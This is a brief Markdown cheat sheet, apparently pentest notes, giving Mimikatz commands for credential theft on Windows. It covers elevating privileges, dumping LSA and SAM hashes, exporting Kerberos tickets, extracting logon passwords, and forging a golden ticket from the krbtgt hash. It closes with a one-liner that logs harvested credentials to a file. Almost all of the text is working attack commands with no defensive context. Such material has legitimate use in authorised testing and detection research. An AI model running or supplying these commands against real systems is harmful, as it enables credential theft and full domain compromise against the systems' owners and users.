# Mimikatz Usage * Check your privilege, boy ```sh privilege::debug token::elevate ``` ## Dump hashes * NTLM ```sh $ lsadump::lsa /patch ``` ```sh sekurlsa::tickets /export ``` ## Dump Local Password hashes ```sh token::elevate ``` ```sh lsadump::sam ``` * Form logged in users ```sh sekurlsa::logonPasswords ``` ## Golden ticket * Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi ```sh $ lsadump::lsa /inject /name:krbtgt $ kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behinde domainname> /krbtgt:<NTLMhash> /id:<RID(dec)> ``` * use the golden ticket, open a new elevated prompt ```sh misc::cmd ``` ## Oneliner * Get the stuff ```sh .\mimikatz "log host-42.log" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit ```